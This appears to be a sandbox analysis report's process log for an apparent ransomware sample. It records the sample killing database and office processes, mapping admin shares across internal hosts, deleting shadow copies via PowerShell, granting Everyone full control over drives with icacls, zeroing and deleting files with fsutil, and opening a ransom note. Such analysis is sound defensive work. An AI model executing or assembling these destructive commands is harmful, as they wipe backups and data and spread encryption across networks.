C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\B$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\N$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\D$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\C$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\O$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\E$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\D$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\P$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\F$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\E$2⤵
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\Q$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\G$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\F$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\R$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\H$2⤵
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\G$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\I$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\S$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\H$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\T$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\J$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\I$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\K$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\U$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\L$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\J$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\V$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\K$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\W$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\M$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\L$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\N$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\X$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\M$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\Y$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\O$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\Z$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\P$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\Q$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\R$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\S$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.39\Users2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.39\T$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.39\U$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.39\A$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\Users2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\B$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\V$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\A$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\C$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\W$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\B$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\N$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\D$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\X$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\C$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\O$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\E$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\Y$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\D$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\P$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\F$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\Z$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\E$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\Q$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\G$2⤵
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\F$2⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\R$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\H$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\G$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\S$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\I$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\H$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\T$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\J$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\I$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\Users2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\U$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\K$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\J$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\A$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\V$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\L$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\K$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\B$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\W$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\M$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\C$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\L$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\X$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\N$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\M$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\D$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\Y$2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\net_shares.exe2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "459276405-12352579554562502631383936751061481147-16520052601344819490-2130542768"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e